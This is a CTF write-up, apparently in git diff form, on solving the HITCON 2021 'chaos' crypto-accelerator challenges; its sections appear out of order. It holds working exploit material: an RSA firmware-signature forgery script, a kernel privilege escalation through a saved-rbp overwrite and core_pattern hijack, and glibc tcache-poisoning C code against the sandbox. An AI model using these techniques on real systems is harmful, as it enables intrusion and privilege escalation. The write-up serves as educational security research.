There are many ways to exploit this. The target VM has no SMEP and no SMAP, which means that we can redirect any kernel data and code pointers to memory controlled by us in userspace. With some trial and error to figure out which offsets would overwrite what value, we found that offset 0x13b13b13b13ad88c reliably overwrites a saved rbp on the kernel’s stack. This value depends on what other vmalloc allocations the kernel did before running the exploit so it’s somewhat specific to the setup we used but it works reliably. The overwrite clears the top 16 bits of the saved rbp, which redirects it to a userspace address. We can mmap this address and gain control of the kernel’s stack as soon as the kernel executes a leave instruction. We then only have to fill the fake stack with a pointer to some shellcode.
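The index above looks odd until it is converted to a byte offset. The sketch below assumes that the queue is indexed as an array of 13-byte descriptors and that the address computation wraps at 64 bits, as ordinary pointer arithmetic does; the helper name is ours.

```python
DESC_SIZE = 13                      # size of one packed command descriptor
ACCESS_MASK = 0xFFFFFFFFFFFFFDFF    # bit 9 is cleared before indexing
U64 = 1 << 64


def byte_offset(index: int) -> int:
    """Signed byte offset from the start of the command queue for a head index."""
    off = ((index & ACCESS_MASK) * DESC_SIZE) % U64  # wraps like 64-bit pointer math
    return off - U64 if off >= U64 // 2 else off


INDEX = 0x13B13B13B13AD88C
print(hex(byte_offset(INDEX)))
```

Under these assumptions the multiplication by 13 wraps around, so the index corresponds to a write 0x300e4 bytes below the start of the command queue rather than far above it.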
The shellcode is pretty simple: it reads the IA32_LSTAR MSR, which contains the address of the system call handler, to recover the address of the kernel and then overwrites core_pattern with the path to our exploit. It then executes swapgs; sysret to return to userspace. The exploit returns to userspace at an invalid address and crashes, which runs the core dump handler, which is now our exploit itself. The core dump handler runs as root, so our exploit can read the flag and print it to the serial console.
Flag: hitcon{so this is how we attack kernel from a device}
+
+
Part 3: Sandbox
+
+
Analysis
+
+
The flag for part 3 is also a file outside the sandbox. However unlike in part 1, there is no system call that copies the flag into the CHAOS memory for us. The sandbox only opens the file that contains the third flag, but then doesn’t do anything with it. Clearly this means that we must somehow pwn the sandbox and read the contents of the file somewhere into shared memory where our firmware can access them. As we mentioned before, the sandbox has some system calls that let the chip perform some cryptographic operations on data supplied by the firmware. More specifically, the sandbox implements the following:
+
+
+
MD5
+
SHA256
+
AES encrypt/decrypt
+
RC4 encrypt/decrypt
+
Blowfish encrypt/decrypt
+
Twofish encrypt/decrypt
+
Threefish encrypt/decrypt
+
+
+
Except for MD5 and SHA256, all of these operations also need a key. The client can use add_key and delete_key to add and remove keys from the sandbox’s key storage. The key storage is implemented as a std::map<uint32_t, struct buffer>, which maps a key ID to the key data and is implemented using a search tree.
+
+
Now, except for MD5, SHA256 and RC4 all of the algorithms implemented in the sandbox are block ciphers, which take a fixed-size block of input and produce a block of output having the same size as the input. The block size is usually a fixed value chosen by the designers of the algorithm.
+
+
Consider now the function that implements Threefish encryption, which has a block size of 32 bytes:
While the function checks that the size of the input is not bigger than the block size, it doesn’t check that it’s exactly equal to the block size. On top of that, it allocates an output buffer whose size is the same as the size of the input, rather than a fixed-size buffer. This means that the encryption can write out of bounds if we pass it an input buffer that is smaller than 32 bytes. All block ciphers have this bug, but it’s only exploitable with Threefish because it’s the only cipher with a block size greater than 24 bytes, which is the smallest usable buffer returned by glibc’s malloc. This bug gives us an 8-byte out of bounds read and an 8-byte out of bounds write on a heap chunk of size 24 (the input data is also assumed to be 32 bytes).
+
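The 24-byte figure follows from how glibc rounds request sizes on 64-bit systems. The sketch below mirrors that rounding for small requests; the constants are the usual x86_64 values and the helper names are ours, not taken from the sandbox.

```python
SIZE_SZ = 8         # size of a chunk header field on 64-bit glibc
ALIGN_MASK = 0xF    # chunks are 16-byte aligned
MIN_CHUNK = 0x20    # smallest chunk malloc hands out
BLOCK = 32          # Threefish block size used by the sandbox


def chunk_size(request: int) -> int:
    """Chunk size glibc picks for a request (same rounding as request2size)."""
    return max(MIN_CHUNK, (request + SIZE_SZ + ALIGN_MASK) & ~ALIGN_MASK)


def usable_size(request: int) -> int:
    """Bytes the caller may use before reaching the next chunk's size field."""
    return chunk_size(request) - SIZE_SZ


def overflow_bytes(request: int, block: int = BLOCK) -> int:
    """Bytes a full block read or write goes past the usable area."""
    return max(0, block - usable_size(request))


for req in (1, 24, 25):
    print(req, hex(chunk_size(req)), usable_size(req), overflow_bytes(req))
```

For any request of up to 24 bytes, a 32-byte block operation touches exactly the 8 bytes that hold the size field of the next chunk, while a cipher with a 16-byte block never leaves the buffer.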
+
Ok, so we have a heap overflow and overread, how can we exploit this? Fortunately, if we do overflow, we do so directly into the size field of the next chunk. Therefore, our goal was to overflow the size field of a small chunk with a large size. However, there were a bunch of complications before achieving this.
+
+
The biggest issue we faced is that neither encryption nor decryption (directly) allows for a controlled overflow. Encryption, of course, leaves mostly gibberish in the overflowed area. Furthermore, since our input also has to be smaller than 32 bytes, part of the encryption input comes from the next heap chunk! This also makes it nontrivial to get a controlled overflow with decryption, since we do not control part of the encrypted input that will be decrypted.
+
+
The intended solution here was to use crypto to your advantage and figure out a way to make known but uncontrolled input decrypt to something you want. However, we found a much easier approach that did not involve pinging our crypto people on discord ;).
+
+
We first present the heap setup we want to have, then how we actually achieved it.
+The basic setup we need is the following, where the three separate parts of the heap can be anywhere.
+
+
+
+
The sizes shown are the actual sizes used by malloc (so rounded up to the nearest 0x10).
+Furthermore, except the sizes for the input / output chunks, the other sizes are not particularly specific.
+However, we do need to have sizeof(L) >> sizeof(S). The goal is now to have roughly the following happen (see note 1 at the end):
In particular, the purposes of the different chunks are as follows:
+
+
+
$I_E$: input to the threefish encryption using overflow. The encryption will read the size of the next chunk $L$ oob, as the last 8 bytes of input.
+
$O_E$ / $I_D$: output of the threefish encryption, but then also input of the threefish decryption. During encryption, the size of the next chunk will be overwritten. During decryption, the size of the next chunk will be read oob, as the last 8 bytes of input.
+
$O_D$: output of the threefish decryption. The size of the next chunk will be overwritten, with the last 8 bytes of output.
+
$L$: A large chunk. We will overwrite the size of $S$, with this size.
+
$D$: A chunk that is never freed. Since we corrupt the size with the encryption, we do not want to free it, otherwise malloc is unhappy.
+
$S$: A small chunk. Target for our overwrite.
+
+
+
This works out well: since nothing changes the ciphertext between encryption and decryption, the output of the decryption must be the same as our initial input. Since the last 8 bytes of the initial input were a large size, the small size of $S$ will be overwritten with this large size. If we now allocate $S$ and free it again, it will be in the tcache of a much larger size than it should be. We can then allocate a chunk of size $0x150$ and get back $S$. Then we have a fully controlled overflow of a much larger area of the heap.
+
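The round trip can be simulated with any invertible 32-byte transform. The sketch below uses a toy XOR-and-reverse cipher in place of Threefish and made-up chunk sizes (0x161, 0x81, 0x41); each region models 24 bytes of user data followed by the size field of the adjacent chunk.

```python
import struct

BLOCK = 32   # cipher block size
USER = 24    # usable bytes in each 0x20 chunk


def toy_encrypt(block: bytes, key: bytes) -> bytes:
    """Stand-in for Threefish: XOR with the key, then reverse the bytes."""
    return bytes(b ^ k for b, k in zip(block, key))[::-1]


def toy_decrypt(block: bytes, key: bytes) -> bytes:
    """Inverse of toy_encrypt."""
    return bytes(b ^ k for b, k in zip(block[::-1], key))


def make_region(next_size: int) -> bytearray:
    """24 bytes of user data followed by the size field of the next chunk."""
    return bytearray(USER) + bytearray(struct.pack("<Q", next_size))


def next_size(region: bytearray) -> int:
    return struct.unpack_from("<Q", region, USER)[0]


key = bytes(range(1, BLOCK + 1))
in_e = make_region(0x161)   # I_E, followed by the large chunk L
out_e = make_region(0x81)   # O_E / I_D, followed by D
out_d = make_region(0x41)   # O_D, followed by the small chunk S
in_e[:USER] = b"A" * USER

# Encryption reads 24 bytes of data plus L's size and writes 32 bytes over O_E and D's size.
out_e[:] = toy_encrypt(bytes(in_e), key)
# Decryption reads those 32 bytes back and writes the plaintext over O_D and S's size.
out_d[:] = toy_decrypt(bytes(out_e), key)

print(hex(next_size(out_e)), hex(next_size(out_d)))
```

In this model the size field after O_E ends up holding ciphertext, which is why $D$ must never be freed, while the size field after O_D ends up holding the size of $L$.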
+
This whole procedure is shown in the image below:
+
+
+
+
So our goal is now clear, we need the specific heap layout and allocations mentioned before.
+But how do we get there?
+
+
There are two major pain points in trying to achieve this.
+Firstly, the heap is not in a clean state when we start our exploit, since the firmware loading also uses the heap already.
+Secondly, there are no good malloc and free primitives. To get the heap into a certain state, ideally we would be able to malloc and free arbitrary sizes. The best primitive we found was the addition and removal of keys. While it allows us to malloc an arbitrarily sized chunk and free it later, it also has a major drawback: the malloc of the size we control happens in between a malloc(0x10) and a malloc(0x30). The former acts as a kind of wrapper around our malloc’d buffer, the latter is the node in a red-black tree. This is the case because the keys are saved inside an std::map.
+
+
Astute readers will have noticed, that the wrapper struct is actually of the same size as our target buffers to overflow.
+In fact, both of these pain points can help us out in certain ways.
+
+
We will now show the heap feng shui of our exploit, then explain why the different allocations work and how they help us towards our goal. But first, we explain the do_malloc and do_free functions. These correspond to adding and removing a key respectively. As such, a simplified view of these is basically:
Since do_malloc first allocates a chunk of size 0x20, then our desired size, we can use it as a primitive for achieving the three parts of the heap we need, as long as the two mallocs happen from a contiguous region. Thankfully, the firmware was allocated as a large heap chunk and, after being freed, was put in the unsorted bin. Therefore, as long as the tcache for our allocation size is empty, the malloc happens contiguously from this unsorted bin. Hence, our chunks from before can be identified:
This also explains the very first allocation. It is done to remove the single 0x20 chunk currently in the tcache.
+inp_prepare then corresponds to our first heap part, the first input buffer and the large chunk.
+dont_free corresponds to the second heap part, while small to the third.
+Both reserved_for_later use a key_buf chunk on the tcache, while the tree_node will be allocated just after our small chunk.
+This will be our target for overwriting with the controlled overflow later.
+
+
Finally, we have to do some freeing to get our tcache in the correct order. In the end, we would like to have the following tcache for 0x20:
+
+
head -> inp_prepare.buffer -> dont_free.buffer -> small.buffer
+
+
+
To this end, we first swap the buffer struct used for dont_free and first. Otherwise, we would have to free dont_free.key_buf, which we do not want! For that, we first free it temporarily, leading to the following tcache 0x20:
+
+
head -> first.buffer -> dont_free.buffer
+
+
+
Furthermore, dont_free.key_buf is the head of tcache 0x70. Therefore, do_malloc(0x70), will use first.buffer as the buffer, and dont_free.key_buf as its key_buf. Since we never touch the result of this malloc (dont_free2) again, we can be safe that dont_free.key_buf (or as named above $D$) is never freed! Lastly, dont_free_begin.buffer now points to dont_free.buffer and hence the last three frees achieve exactly the tcache layout we want.
+
+
Therefore, the next part of our exploit looks as follows:
First we encrypt. This will use the first entry in the tcache as input, the second as output. Then we make sure to remove the first entry in the tcache. Next we decrypt, and again first entry in tcache is input (previously of course our output), the second as output. This all leads to our desired goal, of smashing the size of small.key_buf with 0x160.
+
+
We now malloc and free small.key_buf, to put it onto the correct tcache:
This will now do the following for the tcache of size 0x40 (remember that those chunks’ tree_nodes were allocated after small.key_buf):
+
+
head -> reserved_for_later.tree_node -> reserved_for_later2.tree_node -> ...
+
+
+
When we now overflow small.key_buf, we can set fd of the chunks that are in tcache.
+Due to the way the allocations work, we need to create some fake chunks first, which we point to.
+The fake chunks are created as follows inside dram:
+
+
puts("Creating fake chunks");
+
+uint64_t *fake_chunk = dram + 0x20000;
+uint64_t *fake_chunk2 = dram + 0x20080;
+fake_chunk[-1] = 0x41;
+fake_chunk[0] = fake_chunk2;
+fake_chunk[1] = 0;
+
+fake_chunk2[-1] = 0x41;
+// this is the address we actually wanna overwrite
+fake_chunk2[0] = fd_addr;
+fake_chunk2[1] = 0;
+
+uint64_t *fake_chunk4 = dram + 0x20100;
+fake_chunk4[-1] = 0x21;
+fake_chunk4[0] = 0;
+fake_chunk4[1] = 0;
+
+uint64_t *fake_chunk3 = dram + 0x20180;
+fake_chunk3[-1] = 0x21;
+fake_chunk3[0] = fake_chunk4;
+fake_chunk3[1] = 0;
+
+
+
Now we can finally overflow:
+
+
puts("smashing actual chunks");
+
+memset(overwrite, 'A', sizeof(overwrite));
+
+uint64_t *over = &overwrite[0];
+
+// Due to the free of the reserved_for_later chunks
+// We also need to fixup these buffer chunks on the heap.
+over[31] = 0x21;
+over[32] = fake_chunk3;
+over[33] = 0;
+// This is our actual target!
+over[23] = 0x41;
+over[24] = fake_chunk;
+over[25] = 0;
+
+size_t my_key = add_key(overwrite, sizeof(overwrite));
+
+
+
The tcache for 0x20 and 0x40 now looks as follows:
+
+
head[0x20] -> reserved_for_later.buffer -> fake_chunk3 -> fake_chunk4
+head[0x40] -> fake_chunk -> fake_chunk2 -> fd_addr // location of flag1 file descriptor
+
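The order in which these entries are handed out can be traced with a small model. It assumes that add_key performs its three allocations in the order described earlier (wrapper struct, key data, tree node) and that every allocation is served from the head of the matching tcache bin; entries are plain labels, and whatever follows fd_addr in the 0x40 bin is not modeled.

```python
from collections import deque

# Tcache bins as listed above, head first.
tcache = {
    0x20: deque(["reserved_for_later.buffer", "fake_chunk3", "fake_chunk4"]),
    0x40: deque(["fake_chunk", "fake_chunk2", "fd_addr"]),
}


def chunk_size(request: int) -> int:
    """glibc rounding of a request size to a chunk size on 64-bit."""
    return max(0x20, (request + 8 + 15) & ~15)


def malloc(request: int) -> str:
    """Pop the head of the matching tcache bin; other malloc paths are not modeled."""
    entries = tcache[chunk_size(request)]
    return entries.popleft() if entries else "<not modeled>"


def add_key(key_len: int) -> dict:
    """Allocations made when adding a key: wrapper struct, key data, tree node."""
    return {
        "buffer": malloc(0x10),
        "key_buf": malloc(key_len),
        "tree_node": malloc(0x30),
    }


first = add_key(0x30)
second = add_key(0x30)
print(first)
print(second)
```

In this model the first key consumes fake_chunk and fake_chunk2, and the key data of the second key lands on fd_addr.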
+
+
Hence, if we create two keys of length 0x30, the second key allocation will be overwriting fd_addr, allowing us to change the file descriptor from flag1 to the one for flag3. Then we can just reuse our exploit for the first flag:
Thanks to david942j and lyc for putting together this series of challenges, they were really fun to solve. You can find the source code for the challenges together with the official solution on github. Until next time!
+
+
+
+
1. Note that the mallocs will actually happen at different times; this is just to illustrate the basic idea.
+
diff --git a/HITCON-2021/pwn/chaos.md b/HITCON-2021/pwn/chaos.md
new file mode 100755
index 0000000..99c1db5
--- /dev/null
+++ b/HITCON-2021/pwn/chaos.md
@@ -0,0 +1,1055 @@
+# Chaos
+
+**Authors**: [Nspace](https://twitter.com/_MatteoRizzo), [gallileo](https://twitter.com/galli_leo_)
+
+**Tags**: pwn, crypto, kernel, sandbox, heap
+
+**Points**: 334 + 421 + 450
+
+> Let's introduce our brand new device for this cryptocurrency era - CHAOS the CryptograpHy AcceleratOr Silicon!
+>
+> Remote Env: Ubuntu 20.04
+>
+> `nc 52.197.161.60 3154`
+>
+> [chaos-7e0d17f7553a86831ec6f1a5aba6bdb8cfab5674.tar.gz](https://hitcon-2021-quals.s3.ap-northeast-1.amazonaws.com/chaos-7e0d17f7553a86831ec6f1a5aba6bdb8cfab5674.tar.gz)
+
+## Introduction
+
+Last week we played HITCON CTF 2021, one of the hardest events of the year, and placed 4th. During the CTF we (Nspace and gallileo) spent most of our time working on the chaos series of challenges written by [david942j](https://twitter.com/david942j) and lyc. This writeup explains the structure of the challenges and discusses how we solved each of the 3 stages. Out of nearly 300 teams in the CTF, we were the only team to solve all 3 challenges, and the first team to solve chaos-kernel and chaos-sandbox.
+
+Let's get started!
+
+## Challenge architecture
+
+This series of challenges simulates a custom hardware cryptographic accelerator attached to a Linux computer. The setup is fairly complex and has a lot of moving parts:
+
+* A modified QEMU with a custom CHAOS PCI device. The virtual PCI device lets the guest interact with the emulated CHAOS chip.
+* A Linux VM running inside QEMU. The VM loads a driver for the CHAOS chip, called `chaos.ko`, into the kernel. Userspace programs can talk to CHAOS through the driver.
+* A userspace CHAOS client that uses CHAOS to perform cryptographic operations.
+* A firmware binary that runs on the emulated CHAOS chip.
+* A sandbox binary that emulates the CHAOS chip and runs the firmware.
+
+The following image shows an overview of all the components and how they interact.
+
+![CHAOS challenge architecture](chaos1.jpg)
+
+There are 3 challenges in the series, each with a different flag:
+
+* chaos-firmware (10 solves, 334 points): the flag is in a file outside the VM (`flag_firmware`).
+* chaos-kernel (3 solves, 421 points): the flag is in a file inside the VM that only root can read.
+* chaos-sandbox (2 solves, 450 points): the flag is in a file outside the VM (`flag_sandbox`).
+
+### CHAOS virtual device
+
+CHAOS is a virtual cryptographic accelerator attached to the PCI bus of the virtual machine. It exposes 2 PCI memory resources to the VM: an MMIO area with 16 registers (`csrs`), and 1 MB of dedicated on-chip memory (`dram`). The VM can interact with CHAOS by reading and writing to these two memory regions and CHAOS can send interrupts to the VM. The implementation is split into 3 parts: a virtual PCI device in QEMU, a sandbox binary, and some firmware that runs on the virtual chip.
+
+The PCI device in QEMU doesn't do much. At startup it allocates space for the two memory regions using `memfd` and launches the sandbox binary. The QEMU process and the sandbox share the two memfds and two eventfds used to signal interrupts. After startup, the virtual PCI device is only used to send interrupts to the VM or the sandbox and to handle the VM's memory accesses.
+
+### CHAOS sandbox
+
+The sandbox does the actual chip emulation, so it's more interesting. At startup it mmaps the two shared memory areas, opens two flag files (`flag_firmware` and `flag_sandbox`), and waits until the VM sends it the firmware. Once the VM sends the firmware, the sandbox validates it, forks, and runs the firmware in the child process. The sandbox ptraces the firmware process and uses `PTRACE_SYSEMU` to intercept all the system calls made by the firmware. The firmware's system calls are not handled by the kernel, but by the sandbox. This lets the sandbox implement a custom syscall interface for the firmware, and prevents the firmware from directly accessing files or other system resources.
+
+The sandbox implements only a few system calls:
+
+* `exit` stops the firmware and sends the exit code back to the VM. The sandbox restarts the firmware on the next memory access from the VM.
+* `add_key` and `delete_key` add and remove cryptographic keys supplied by the firmware to the sandbox's key storage.
+* `do_crypto` performs a cryptographic operation on data supplied by the firmware and returns the result to the firmware.
+* `get_flag` reads `flag_firmware` into the chip's memory.
+
+### CHAOS firmware
+
+The firmware is a flat x86_64 binary, which runs in a child process of the sandbox. Since it runs under ptrace with `PTRACE_SYSEMU`, it cannot directly make system calls to the kernel, but must do so through the sandbox. The firmware is not executed with `execve`, but simply loaded in memory and jumped to. It executes in a copy of the sandbox's memory space, so it has direct access to the MMIO area and the CHAOS device memory.
+The challenge has an example firmware, but also lets us provide our own firmware, which can be an arbitrary binary up to 10 kB in size. The sandbox will refuse to load a firmware image unless it passes an RSA signature check.
+
+### CHAOS driver
+
+`chaos.ko` is a Linux kernel-mode driver that interfaces with the virtual CHAOS chip over PCI. It is responsible for managing the CHAOS chip's memory, loading the firmware, servicing interrupts, and providing userspace programs with an interface to the CHAOS chip. The userspace interface uses a misc character device (`/dev/chaos`) and exposes two IOCTLs:
+
+* ALLOC_BUFFER allocates a buffer of a given size in the CHAOS chip's memory. This can only be done once per open file. After calling this ioctl the client can access the buffer by mmapping the file descriptor.
+* DO_REQUEST sends a request to perform a cryptographic operation to the CHAOS chip, waits for the request to complete, and then returns.
+
+The chip side of the interface uses two ring buffers: a command queue and a response queue. The command queue contains request descriptors, which specify what operation CHAOS should perform. Each request descriptor contains a pointer to the input data in the CHAOS memory, the size of the data, an opcode, and a request ID. The response queue contains response descriptors (request ID and status code). After enqueuing a new request, the driver signals a mailbox in the CHAOS MMIO area, which makes the sandbox run the firmware, and then blocks.
+
+When the firmware returns, the virtual PCI device raises an interrupt. The driver's interrupt handler processes the response queue, then wakes up the request threads. When a blocked request thread sees that the chip completed its request, it unblocks and returns the result to userspace.
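+
+The index arithmetic shared by both queues can be modelled in a few lines of Python. This is only a sketch based on the decompiled driver code shown in Part 2: the constant and function names are ours, and we assume the firmware advances the tail the same way the driver advances the head.
+
+```python
+QUEUE_SLOTS = 512                          # descriptors per ring
+INDEX_MASK = 0x3FF                         # indices run over 2 * QUEUE_SLOTS values
+SLOT_MASK = ~0x200 & 0xFFFFFFFFFFFFFFFF    # the driver clears bit 9 to get the slot
+
+
+def advance(index):
+    """Increment a head or tail index the way the driver does."""
+    return (index + 1) & INDEX_MASK
+
+
+def slot(index):
+    """Map an index to a slot number in the ring."""
+    return index & SLOT_MASK
+
+
+def is_full(head, tail):
+    """The ring is full when head and tail differ only in bit 9."""
+    return (head ^ tail) == QUEUE_SLOTS
+
+
+head = tail = 0
+enqueued = 0
+while not is_full(head, tail):
+    head = advance(head)
+    enqueued += 1
+print(enqueued, slot(head))
+```
+
+Letting the indices run over twice the number of slots is a common ring buffer trick: the extra bit distinguishes a full queue (`head ^ tail == 512`) from an empty one (`head == tail`).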
+
+### CHAOS client
+
+The last piece is the client, a regular Linux binary which runs in userspace in the VM. The client can interact with CHAOS through the interface exposed by the driver at `/dev/chaos`. Just like with the firmware, the challenge provides an example client, but also lets us use our own which can be an arbitrary binary up to 1 MB in size. Unlike the firmware, the client doesn't have to pass a signature check. The client runs as an unprivileged user, so it cannot read the flag inside the VM.
+
+## Preparation
+
+Since the challenge setup is quite complex with a lot of moving parts, we wanted to reduce the complexity and make debugging easier. Since Part 1 and Part 3 can ignore the kernel module and QEMU for the most part, we wrote a script to launch the sandbox binary standalone.
+
+The setup is quite simple: we create the memfds and eventfds in Python, then use `pwntools` to spawn the sandbox process. We also have some utility functions for "interacting" with the memory regions. The script shown below already uses part of the solution for Part 1. It also already contains a more "advanced" firmware feature we added for Part 3: an output buffer, so that we can use `printf` inside the firmware.
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+# for type info in vscode
+from pwnlib.tubes.process import process
+from pwnlib import gdb, context
+from pwnlib.elf import ELF
+from ctypes import *
+import os
+import memfd
+from hashlib import sha256
+from math import prod
+from skein import threefish
+import twofish
+
+def memfd_create(name, flags):
+ return memfd.memfd_create(name, flags)
+
+# whatever
+libc = cdll.LoadLibrary("libc.so.6")
+def eventfd(init_val, flags):
+ return libc.eventfd(init_val, flags)
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF('sandbox')
+
+# SETUP LOCAL ENV
+csr_fd = memfd_create("dev-csr", 0)
+log.info("csr_fd: %d", csr_fd)
+os.truncate(csr_fd, 0x80)
+dram_fd = memfd_create("dev-dram", 0)
+log.info("dram_fd: %d", dram_fd)
+os.truncate(dram_fd, 0x100000)
+evtfd_to_dev = eventfd(0, 0)
+log.info("evtfd_to_dev: %d", evtfd_to_dev)
+evtfd_from_dev = eventfd(0, 0)
+
+def preexec():
+ # WARNING: using log.* stuff inside the preexec functions can cause hangs, no idea why
+ # log.info("Before executing, setting up the filedescriptors")
+ os.dup2(csr_fd, 3)
+ os.dup2(dram_fd, 4)
+ os.dup2(evtfd_to_dev, 5)
+ os.dup2(evtfd_from_dev, 6)
+ # log.info("Finished with duplicating filedesc")
+
+def wait_for_interrupt():
+ log.debug("Waiting for interrupt from device")
+ res = os.read(evtfd_from_dev, 8)
+ log.debug("Got 0x%x", u64(res))
+ return res
+
+def send_interrupt(val = 1):
+ log.debug("Sending interrupt with val 0x%x", val)
+ os.write(evtfd_to_dev, p64(val))
+
+def write_mem(fd, off, val: bytes):
+ log.debug("Writing to %d @ 0x%x: %s", fd, off, hexdump(val))
+ os.lseek(fd, off, os.SEEK_SET)
+ os.write(fd, val)
+
+def write_mem_64(fd, off, val: int):
+ write_mem(fd, off, p64(val))
+
+def read_mem(fd, off, size) -> bytes:
+ log.debug("Reading from %d @ 0x%x", fd, off)
+ os.lseek(fd, off, os.SEEK_SET)
+ return os.read(fd, size)
+
+def read_mem_64(fd, off) -> int:
+ res = read_mem(fd, off, 8)
+ return u64(res)
+
+def load_firmware(data, dram_off = 0):
+ log.info("Loading firmware of size 0x%x, dram @ 0x%x", len(data), dram_off)
+ # mapping firmware directly at beginning of dram, hopefully that's ok lmao
+ write_mem(dram_fd, dram_off, data)
+ write_mem_64(csr_fd, 0, dram_off)
+ write_mem_64(csr_fd, 8, len(data))
+ send_interrupt()
+ res = wait_for_interrupt()
+ int_val = u64(res)
+ log.info("Got interrupt: 0x%x", int_val) # should be > 0x1336
+ load_res = read_mem_64(csr_fd, 0)
+ log.info("Got result for loading: 0x%x", load_res)
+
+def build_firmware(shellcode):
+ header = p32(len(shellcode))
+ header += p8(0x82)
+ header += bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
+
+ factors = [13, 691267, 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073
+ ]
+ phi=prod([i-1 for i in factors])
+ dec=pow(0x10001,-1,phi)
+ act = int.from_bytes(sha256(shellcode).digest(), "little")
+ header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little')
+ return header + shellcode
+
+OUT_OFF = 0x50000
+
+def read_outputbuf():
+ ret = b""
+ off = OUT_OFF
+ while True:
+ curr = read_mem(dram_fd, off, 1)
+ if curr == b"\0":
+ break
+ ret += curr
+ off += 1
+ return ret
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ p = process([exe.path] + argv, *a, **kw)
+ if args.GDB:
+ gdb.attach(p, gdbscript=gdbscript)
+ return p
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Full RELRO
+# Stack: Canary found
+# NX: NX enabled
+# PIE: PIE enabled
+
+io = start(preexec_fn=preexec, close_fds=False)
+
+# to allow attaching
+if args.PAUSE:
+ pause()
+
+DRAM_START = 0x10000000
+
+# sh = shellcraft.syscall(0xC89FC, arg0=DRAM_START + 0x1000)
+# sh += shellcraft.syscall(60, 0)
+
+# asm_sh = asm(sh)
+
+import subprocess
+
+subprocess.check_call(['make'])
+firm = read("./firmware")
+# firm = build_firmware(asm_sh)
+load_firmware(firm)
+
+log.info("Firmware read ok => launching firmware now!")
+send_interrupt()
+
+wait_for_interrupt()
+# pause()
+log.info("Got interrupt, firmware is done now!")
+
+output = read_outputbuf()
+
+log.info("Output buffer of firmware is:\n%s", hexdump(output))
+
+log.info("As string:\n%s", output.decode("ascii", errors='ignore'))
+
+io.interactive()
+```
+
+## Part 1: Firmware
+
+The firmware can request the flag for this challenge from the
+sandbox by using the `get_flag` syscall, and then write it to the CHAOS memory where our client in userspace can read it. Unfortunately the provided firmware never uses this system call, so there is no way to get the flag without either pwning the firmware from userspace or creating our own firmware that gets the flag and passes the RSA signature check. Since the challenge is in both the crypto and the pwn category and we can supply our own firmware, we tried to look for a way to bypass the signature check. This is the function that validates the firmware:
+
+```c
+struct firmware_header {
+ uint32_t size;
+ uint8_t key_size;
+ uint8_t key[255];
+ uint8_t signature[256];
+ uint8_t data[];
+};
+
+static const uint8_t pubkey[] = { /*...*/ };
+
+void load_firmware(void)
+{
+ uint32_t firmware_offset; // esi
+ uint32_t firmware_size; // eax
+ firmware_header *firmware; // rbx
+ unsigned int key_size; // er14
+ buffer *p_result; // rcx
+ buffer *p_firm_sha; // rax
+ buffer *v7; // rdx
+ unsigned int size; // ebp
+ unsigned int signature_size; // ebx
+ uint8_t *sha_data; // r12
+ uint8_t *x; // rax
+ int rsa_e; // [rsp+Ch] [rbp-29Ch] BYREF
+ buffer firm_data; // [rsp+10h] [rbp-298h] BYREF
+ buffer firm_sha; // [rsp+20h] [rbp-288h] BYREF
+ buffer n; // [rsp+30h] [rbp-278h] BYREF
+ buffer signature; // [rsp+40h] [rbp-268h] BYREF
+ buffer e; // [rsp+50h] [rbp-258h] BYREF
+ buffer result; // [rsp+60h] [rbp-248h] BYREF
+ firmware_header header; // [rsp+70h] [rbp-238h] BYREF
+
+ firmware_offset = csr[0];
+ firmware_size = csr[1];
+
+ // Size/bounds checks
+ if (firmware_size <= 0x204) {
+ csr[0] = -22;
+ return;
+ }
+
+ firmware = &dram_file.data[firmware_offset];
+ memcpy(&header, firmware, sizeof(header));
+ if (header.size + sizeof(header) != firmware_size || header.size > firmware_data.size ) {
+ csr[0] = -22;
+ return;
+ }
+
+ make_buffer(&firm_data, firmware->data, header.size);
+ calc_sha256(&firm_sha, &firm_data);
+
+ // Check the public key that signed the firmware.
+ key_size = header.key_size;
+ make_buffer(&n, firmware->key, header.key_size);
+ if (memcmp(n.data, pubkey, 128)) {
+ csr[0] = -129;
+ return;
+ }
+
+ make_buffer(&signature, firmware->signature, key_size);
+
+ // Verify the signature.
+ rsa_e = 0x10001;
+ make_buffer(&e, &rsa_e, 4);
+ do_rsa_encrypt(&result, &n, &e, &signature);
+
+ p_result = &result;
+ p_firm_sha = &firm_sha;
+ while (1) {
+ size = p_firm_sha->size;
+ signature_size = p_result->size;
+ if ( size >= signature_size )
+ break;
+ v7 = p_firm_sha;
+ p_firm_sha = p_result;
+ p_result = v7;
+ }
+
+ sha_data = p_firm_sha->data;
+ if (!memcmp(sha_data, p_result->data, signature_size)) {
+ x = &sha_data[signature_size];
+ while (size > signature_size) {
+ if (*x++) {
+ goto fail;
+ }
+ ++signature_size;
+ }
+
+ // Firmware valid
+ memcpy(firmware_data.data, firm_data.data, firm_data.size);
+ csr[0] = 0x8000000000000000LL;
+ return;
+ }
+
+fail:
+ csr[0] = -74;
+}
+```
+
+The sandbox compares only the first 128 bytes of N against the trusted public key, but N can be up to 255 bytes long, with the size controlled by us. Furthermore, there are no checks that N is actually a product of two primes. This means that we can sign the firmware with our own RSA key as long as the first 128 bytes of the modulus match the key accepted by the sandbox.
+
